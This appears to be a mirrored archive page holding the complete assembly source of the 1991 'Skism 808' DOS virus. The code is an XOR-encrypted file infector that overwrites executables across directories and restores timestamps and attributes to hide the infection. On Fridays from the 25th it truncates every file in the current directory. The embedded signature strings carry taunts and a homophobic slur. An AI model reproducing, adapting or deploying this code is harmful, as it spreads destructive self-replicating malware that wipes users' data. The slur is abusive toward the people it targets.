mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-25 19:45:06 +00:00
306 lines
11 KiB
NASM
306 lines
11 KiB
NASM
|
|
|||
|
;tHE sKISM 808 vIRUS. cREATED 1991 BY sMART kIDS iNTO sICK mETHODS.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
FILENAME equ 30 ;USED TO FIND FILE NAME
|
|||
|
FILEATTR equ 21 ;USED TO FIND FILE ATTRIBUTES
|
|||
|
FILEDATE equ 24 ;USED TO FIND FILE DATE
|
|||
|
FILETIME equ 22 ;USED TO FIND FILE TIME
|
|||
|
|
|||
|
|
|||
|
|
|||
|
CODE_START equ 0100H ;START OF ALL .com FILES
|
|||
|
VIRUS_SIZE equ 808 ;tr 808
|
|||
|
|
|||
|
|
|||
|
CODE SEGMENT 'CODE'
|
|||
|
ASSUME CS:CODE,DS:CODE,ES:CODE
|
|||
|
ORG CODE_START
|
|||
|
|
|||
|
MAIN PROC NEAR
|
|||
|
|
|||
|
JMP VIRUS_START
|
|||
|
|
|||
|
ENCRYPT_VAL DB 00H
|
|||
|
|
|||
|
VIRUS_START:
|
|||
|
|
|||
|
CALL ENCRYPT ;ENCRYPT/DECRYPT FILE
|
|||
|
JMP VIRUS ;GO TO START OF CODE
|
|||
|
|
|||
|
ENCRYPT:
|
|||
|
|
|||
|
PUSH CX
|
|||
|
MOV BX,OFFSET VIRUS_CODE ;START ENCRYPTION AT DATA
|
|||
|
|
|||
|
XOR_LOOP:
|
|||
|
|
|||
|
MOV CH,[BX] ;READ CURRENT BYTE
|
|||
|
XOR CH,ENCRYPT_VAL ;GET ENCRYPTION KEY
|
|||
|
MOV [BX],CH ;SWITCH BYTES
|
|||
|
INC BX ;MOVE BX UP A BYTE
|
|||
|
CMP BX,OFFSET VIRUS_CODE+VIRUS_SIZE
|
|||
|
;ARE WE DONE WITH THE ENCRYPTION
|
|||
|
JLE XOR_LOOP ;NO? KEEP GOING
|
|||
|
POP CX
|
|||
|
RET
|
|||
|
|
|||
|
|
|||
|
INFECTFILE:
|
|||
|
|
|||
|
MOV DX,CODE_START ;WHERE VIRUS STARTS IN MEMORY
|
|||
|
MOV BX,HANDLE ;LOAD BX WITH HANDLE
|
|||
|
PUSH BX ;SAVE HANDLE ON STACK
|
|||
|
CALL ENCRYPT ;ENCRYPT FILE
|
|||
|
POP BX ;GET BACK BX
|
|||
|
MOV CX,VIRUS_SIZE ;NUMBER OF BYTES TO WRITE
|
|||
|
MOV AH,40H ;WRITE TO FILE
|
|||
|
INT 21H ;
|
|||
|
PUSH BX
|
|||
|
CALL ENCRYPT ;FIX UP THE MESS
|
|||
|
POP BX
|
|||
|
RET
|
|||
|
|
|||
|
VIRUS_CODE:
|
|||
|
|
|||
|
WILDCARDS DB "*",0 ;SEARCH FOR DIRECTORY ARGUMENT
|
|||
|
FILESPEC DB "*.exe",0 ;SEARCH FOR exe FILE ARGUMENT
|
|||
|
FILESPEC2 DB "*.*",0
|
|||
|
ROOTDIR DB "\",0 ;ARGUMENT FOR ROOT DIRECTORY
|
|||
|
DIRDATA DB 43 DUP (?) ;HOLDS DIRECTORY dta
|
|||
|
FILEDATA DB 43 DUP (?) ;HOLDS FILES dta
|
|||
|
DISKDTASEG DW ? ;HOLDS DISK DTA SEGMENT
|
|||
|
DISKDTAOFS DW ? ;HOLDS DISK DTA OFFSET
|
|||
|
TEMPOFS DW ? ;HOLDS OFFSET
|
|||
|
TEMPSEG DW ? ;HOLDS SEGMENT
|
|||
|
DRIVECODE DB ? ;HOLDS DRIVE CODE
|
|||
|
CURRENTDIR DB 64 DUP (?) ;SAVE CURRENT DIRECTORY INTO THIS
|
|||
|
HANDLE DW ? ;HOLDS FILE HANDLE
|
|||
|
ORIG_TIME DW ? ;HOLDS FILE TIME
|
|||
|
ORIG_DATE DW ? ;HOLDS FILE DATE
|
|||
|
ORIG_ATTR DW ? ;HOLDS FILE ATTR
|
|||
|
IDBUFFER DW 2 DUP (?) ;HOLDS VIRUS ID
|
|||
|
|
|||
|
VIRUS:
|
|||
|
|
|||
|
MOV AX,3000H ;GET DOS VERSION
|
|||
|
INT 21H ;
|
|||
|
CMP AL,02H ;IS IT AT LEAST 2.00?
|
|||
|
JB BUS1 ;WON'T INFECT LESS THAN 2.00
|
|||
|
MOV AH,2CH ;GET TIME
|
|||
|
INT 21H ;
|
|||
|
MOV ENCRYPT_VAL,DL ;SAVE M_SECONDS TO ENCRYPT VAL SO
|
|||
|
;THERES 100 MUTATIONS POSSIBLE
|
|||
|
SETDTA:
|
|||
|
|
|||
|
MOV DX,OFFSET DIRDATA ;OFFSET OF WHERE TO HOLD NEW DTA
|
|||
|
MOV AH,1AH ;SET DTA ADDRESS
|
|||
|
INT 21H ;
|
|||
|
|
|||
|
NEWDIR:
|
|||
|
|
|||
|
MOV AH,19H ;GET DRIVE CODE
|
|||
|
INT 21H ;
|
|||
|
MOV DL,AL ;SAVE DRIVECODE
|
|||
|
INC DL ;ADD ONE TO DL, BECAUSE FUNCTIONS DIFFER
|
|||
|
MOV AH,47H ;GET CURRENT DIRECTORY
|
|||
|
MOV SI, OFFSET CURRENTDIR ;BUFFER TO SAVE DIRECTORY IN
|
|||
|
INT 21H ;
|
|||
|
|
|||
|
MOV DX,OFFSET ROOTDIR ;MOVE DX TO CHANGE TO ROOT DIRECTORY
|
|||
|
MOV AH,3BH ;CHANGE DIRECTORY TO ROOT
|
|||
|
INT 21H ;
|
|||
|
|
|||
|
SCANDIRS:
|
|||
|
|
|||
|
MOV CX,13H ;INCLUDE HIDDEN/RO DIRECTORYS
|
|||
|
MOV DX, OFFSET WILDCARDS ;LOOK FOR '*'
|
|||
|
MOV AH,4EH ;FIND FIRST FILE
|
|||
|
INT 21H ;
|
|||
|
CMP AX,12H ;NO FIRST FILE?
|
|||
|
JNE DIRLOOP ;NO DIRS FOUND? BAIL OUT
|
|||
|
|
|||
|
BUS1:
|
|||
|
|
|||
|
JMP BUS
|
|||
|
|
|||
|
DIRLOOP:
|
|||
|
|
|||
|
MOV AH,4FH ;FIND NEXT FILE
|
|||
|
INT 21H ;
|
|||
|
CMP AX,12H
|
|||
|
JE BUS ;NO MORE DIRS FOUND, ROLL OUT
|
|||
|
|
|||
|
CHDIR:
|
|||
|
|
|||
|
MOV DX,OFFSET DIRDATA+FILENAME;POINT DX TO FCB - FILENAME
|
|||
|
MOV AH,3BH ;CHANGE DIRECTORY
|
|||
|
INT 21H ;
|
|||
|
|
|||
|
MOV AH,2FH ;GET CURRENT DTA ADDRESS
|
|||
|
INT 21H ;
|
|||
|
MOV [DISKDTASEG],ES ;SAVE OLD SEGMENT
|
|||
|
MOV [DISKDTAOFS],BX ;SAVE OLD OFFSET
|
|||
|
MOV DX,OFFSET FILEDATA ;OFFSET OF WHERE TO HOLD NEW DTA
|
|||
|
MOV AH,1AH ;SET DTA ADDRESS
|
|||
|
INT 21H ;
|
|||
|
|
|||
|
SCANDIR:
|
|||
|
|
|||
|
MOV CX,07H ;FIND ANY ATTRIBUTE
|
|||
|
MOV DX,OFFSET FILESPEC ;POINT DX TO "*.com",0
|
|||
|
MOV AH,4EH ;FIND FIRST FILE FUNCTION
|
|||
|
INT 21H ;
|
|||
|
CMP AX,12H ;WAS FILE FOUND?
|
|||
|
JNE TRANSFORM
|
|||
|
|
|||
|
NEXTEXE:
|
|||
|
|
|||
|
MOV AH,4FH ;FIND NEXT FILE
|
|||
|
INT 21H ;
|
|||
|
CMP AX,12H ;NONE FOUND
|
|||
|
JNE TRANSFORM ;FOUND SEE WHAT WE CAN DO
|
|||
|
|
|||
|
MOV DX,OFFSET ROOTDIR ;MOVE DX TO CHANGE TO ROOT DIRECTORY
|
|||
|
MOV AH,3BH ;CHANGE DIRECTORY TO ROOT
|
|||
|
INT 21H ;
|
|||
|
MOV AH,1AH ;SET DTA ADDRESS
|
|||
|
MOV DS,[DISKDTASEG] ;RESTORE OLD SEGMENT
|
|||
|
MOV DX,[DISKDTAOFS] ;RESTORE OLD OFFSET
|
|||
|
INT 21H ;
|
|||
|
JMP DIRLOOP
|
|||
|
|
|||
|
|
|||
|
BUS:
|
|||
|
|
|||
|
JMP ROLLOUT
|
|||
|
|
|||
|
TRANSFORM:
|
|||
|
|
|||
|
MOV AH,2FH ;TEMPORALLY STORE DTA
|
|||
|
INT 21H ;
|
|||
|
MOV [TEMPSEG],ES ;SAVE OLD SEGMENT
|
|||
|
MOV [TEMPOFS],BX ;SAVE OLD OFFSET
|
|||
|
MOV DX, OFFSET FILEDATA + FILENAME
|
|||
|
|
|||
|
MOV BX,OFFSET FILEDATA ;SAVE FILE...
|
|||
|
MOV AX,[BX]+FILEDATE ;DATE
|
|||
|
MOV ORIG_DATE,AX ;
|
|||
|
MOV AX,[BX]+FILETIME ;TIME
|
|||
|
MOV ORIG_TIME,AX ; AND
|
|||
|
MOV AX,[BX]+FILEATTR ;
|
|||
|
MOV AX,4300H
|
|||
|
INT 21H
|
|||
|
MOV ORIG_ATTR,CX
|
|||
|
MOV AX,4301H ;CHANGE ATTRIBUTES
|
|||
|
XOR CX,CX ;CLEAR ATTRIBUTES
|
|||
|
INT 21H ;
|
|||
|
MOV AX,3D00H ;OPEN FILE - READ
|
|||
|
INT 21H ;
|
|||
|
JC FIXUP ;ERROR - FIND ANOTHER FILE
|
|||
|
MOV HANDLE,AX ;SAVE HANDLE
|
|||
|
MOV AH,3FH ;READ FROM FILE
|
|||
|
MOV BX,HANDLE ;MOVE HANDLE TO BX
|
|||
|
MOV CX,02H ;READ 2 BYTES
|
|||
|
MOV DX,OFFSET IDBUFFER ;SAVE TO BUFFER
|
|||
|
INT 21H ;
|
|||
|
|
|||
|
MOV AH,3EH ;CLOSE FILE FOR NOW
|
|||
|
MOV BX,HANDLE ;LOAD BX WITH HANDLE
|
|||
|
INT 21H ;
|
|||
|
|
|||
|
MOV BX, IDBUFFER ;FILL BX WITH ID STRING
|
|||
|
CMP BX,02EBH ;INFECTED?
|
|||
|
JNE DOIT ;SAME - FIND ANOTHER FILE
|
|||
|
|
|||
|
|
|||
|
FIXUP:
|
|||
|
MOV AH,1AH ;SET DTA ADDRESS
|
|||
|
MOV DS,[TEMPSEG] ;RESTORE OLD SEGMENT
|
|||
|
MOV DX,[TEMPOFS] ;RESTORE OLD OFFSET
|
|||
|
INT 21H ;
|
|||
|
JMP NEXTEXE
|
|||
|
|
|||
|
|
|||
|
DOIT:
|
|||
|
|
|||
|
MOV DX, OFFSET FILEDATA + FILENAME
|
|||
|
MOV AX,3D02H ;OPEN FILE READ/WRITE ACCESS
|
|||
|
INT 21H ;
|
|||
|
MOV HANDLE,AX ;SAVE HANDLE
|
|||
|
|
|||
|
CALL INFECTFILE
|
|||
|
|
|||
|
;MOV AX,3EH ;CLOSE FILE
|
|||
|
;INT 21H
|
|||
|
|
|||
|
ROLLOUT:
|
|||
|
|
|||
|
MOV AX,5701H ;RESTORE ORIGINAL
|
|||
|
MOV BX,HANDLE ;
|
|||
|
MOV CX,ORIG_TIME ;TIME AND
|
|||
|
MOV DX,ORIG_DATE ;DATE
|
|||
|
INT 21H ;
|
|||
|
|
|||
|
MOV AX,4301H ;RESTORE ORIGINAL ATTRIBUTES
|
|||
|
MOV CX,ORIG_ATTR
|
|||
|
MOV DX,OFFSET FILEDATA + FILENAME
|
|||
|
INT 21H
|
|||
|
;MOV BX,HANDLE
|
|||
|
;MOV AX,3EH ;CLOSE FILE
|
|||
|
;INT 21H
|
|||
|
MOV AH,3BH ;TRY TO FIX THIS
|
|||
|
MOV DX,OFFSET ROOTDIR ;FOR SPEED
|
|||
|
INT 21H ;
|
|||
|
MOV AH,3BH ;CHANGE DIRECTORY
|
|||
|
MOV DX,OFFSET CURRENTDIR ;BACK TO ORIGINAL
|
|||
|
INT 21H ;
|
|||
|
MOV AH,2AH ;CHECK SYSTEM DATE
|
|||
|
INT 21H ;
|
|||
|
CMP CX,1991 ;IS IT AT LEAST 1991?
|
|||
|
JB AUDI ;NO? DON'T DO IT NOW
|
|||
|
CMP DL,25 ;IS IT THE 25TH?
|
|||
|
JB AUDI ;NOT YET? QUIT
|
|||
|
CMP AL,5 ;IS fRIDAY?
|
|||
|
JNE AUDI ;NO? QUIT
|
|||
|
MOV DX,OFFSET DIRDATA ;OFFSET OF WHERE TO HOLD NEW DTA
|
|||
|
MOV AH,1AH ;SET DTA ADDRESS
|
|||
|
INT 21H ;
|
|||
|
MOV AH,4EH ;FIND FIRST FILE
|
|||
|
MOV CX,7H ;
|
|||
|
MOV DX,OFFSET FILESPEC2 ;OFFSET *.*
|
|||
|
|
|||
|
lOOPS:
|
|||
|
|
|||
|
INT 21H ;
|
|||
|
JC AUDI ;ERROR? THEN QUIT
|
|||
|
MOV AX,4301H ;FIND ALL NORMAL FILES
|
|||
|
XOR CX,CX ;
|
|||
|
INT 21H ;
|
|||
|
MOV DX,OFFSET DIRDATA + FILENAME
|
|||
|
MOV AH,3CH ;FUCK UP ALL FILES IN CURRENT DIR
|
|||
|
INT 21H ;
|
|||
|
JC AUDI ;ERROR? QUIT
|
|||
|
MOV AH,4FH ;FIND NEXT FILE
|
|||
|
JMP LOOPS ;
|
|||
|
|
|||
|
AUDI:
|
|||
|
|
|||
|
MOV AX,4C00H ;END PROGRAM
|
|||
|
INT 21H ;
|
|||
|
|
|||
|
;tHE BELOW IS JUST TEXT TO PAD OUT THE VIRUS SIZE TO 808 BYTES. dON'T
|
|||
|
;JUST CHANGE THE TEXT AND CLAIM THAT THIS IS YOUR CREATION.
|
|||
|
|
|||
|
|
|||
|
WORDS_ DB "sKISM rYTHEM sTACK vIRUS-808. sMART kIDS iNTO sICK mETHODS",0
|
|||
|
WORDS2 DB " dONT ALTER THIS CODE INTO YOUR OWN STRAIN, FAGGIT. ",0
|
|||
|
WORDS3 DB " hr/sss nycITY, THIS IS THE FIFTH OF MANY, MANY MORE....",0
|
|||
|
WORDS4 DB " yOU SISSYS.....",0
|
|||
|
|
|||
|
MAIN ENDP
|
|||
|
CODE ENDS
|
|||
|
END MAIN
|
|||
|
|
|||
|
|